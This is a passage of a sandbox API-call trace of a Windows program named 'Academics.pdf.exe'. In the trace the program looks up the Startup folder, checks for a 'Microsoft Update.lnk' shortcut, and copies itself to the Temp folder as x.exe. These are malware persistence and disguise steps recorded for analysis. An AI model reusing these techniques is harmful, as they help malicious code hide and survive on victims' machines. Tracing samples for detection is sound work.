(lpMsg=0x8bf710) returned 0 [0270.629] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0270.629] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0270.629] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0270.629] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0270.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0270.630] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0270.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0270.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0270.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0270.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0270.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0270.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0270.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0270.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0270.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0270.632] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0270.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0270.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0270.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0270.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0270.633] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0270.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0270.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0270.633] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0270.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0270.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0270.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0270.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0270.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0270.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0270.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0270.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.636] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0xffffffff [0270.636] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk", lpFindFileData=0x8bf4a0 | out: lpFindFileData=0x8bf4a0*(dwFileAttributes=0x7ff, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x24b2fd8, ftLastAccessTime.dwLowDateTime=0x25c0150, ftLastAccessTime.dwHighDateTime=0x1, ftLastWriteTime.dwLowDateTime=0x25c0000, ftLastWriteTime.dwHighDateTime=0x25c0150, nFileSizeHigh=0x8, nFileSizeLow=0x24b2e00, dwReserved0=0x25c0150, dwReserved1=0x2000002, cFileName="", cAlternateFileName="\x10")) returned 0xffffffff [0270.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0270.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0270.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0270.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0270.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0270.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0270.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0270.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0270.637] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0270.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0270.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0270.638] CharUpperBuffW (in: lpsz="ScriptFullPath", cchLength=0xe | out: lpsz="SCRIPTFULLPATH") returned 0xe [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0270.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0270.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240ca38 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0270.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0270.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0270.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0270.640] CharUpperBuffW (in: lpsz="TempDir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa30 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0270.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0270.640] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0270.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0270.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0270.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0270.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0270.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0270.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0270.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c8d0 [0270.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", nBufferLength=0x104, lpBuffer=0x8be9d8, lpFilePart=0x8be594 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFilePart=0x8be594*="Academics.pdf.exe") returned 0x37 [0270.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c8d0 | out: hHeap=0x25c0000) returned 1 [0270.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x56) returned 0x249a7e0 [0270.642] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\x.exe", nBufferLength=0x104, lpBuffer=0x8bebe8, lpFilePart=0x8be594 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\x.exe", lpFilePart=0x8be594*="x.exe") returned 0x2a [0270.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249a7e0 | out: hHeap=0x25c0000) returned 1 [0270.642] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe")) returned 0x20 [0270.642] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\x.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\x.exe")) returned 0xffffffff [0270.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe", lpFindFileData=0x8bedf8 | out: lpFindFileData=0x8bedf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb284da00, ftCreationTime.dwHighDateTime=0x1d509d6, ftLastAccessTime.dwLowDateTime=0xb31d7080, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xe73f6400, ftLastWriteTime.dwHighDateTime=0x1d509cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfd0d, dwReserved0=0x8beec0, dwReserved1=0x7715e192, cFileName="Academics.pdf.exe", cAlternateFileName="ACADEM~1.EXE")) returned 0xaa5660 [0270.642] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\x.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\x.exe")) returned 0xffffffff [0270.642] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\x.exe", lpFindFileData=0x8be320 | out: lpFindFileData=0x8be320*(dwFileAttributes=0x1d509cb, ftCreationTime.dwLowDateTime=0xfd449fd0, ftCreationTime.dwHighDateTime=0x1d509d6, ftLastAccessTime.dwLowDateTime=0xdfd0d, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0xe0000, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x20, nFileSizeLow=0x22, dwReserved0=0x0, dwReserved1=0x410018, cFileName="CADEM~1.EXEAcademics.pdf.exe", cAlternateFileName="")) returned 0xffffffff [0270.643] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\x.exe" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\x.exe"), bFailIfExists=0) returned 1 [0270.689] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bedf8 | out: lpFindFileData=0x8bedf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb284da00, ftCreationTime.dwHighDateTime=0x1d509d6, ftLastAccessTime.dwLowDateTime=0xb31d7080, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xe73f6400, ftLastWriteTime.dwHighDateTime=0x1d509cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfd0d, dwReserved0=0x8beec0, dwReserved1=0x7715e192, cFileName="Academics.pdf.exe", cAlternateFileName="ACADEM~1.EXE")) returned 0 [0270.690] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0270.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0270.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0270.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0270.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0270.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0270.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0270.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 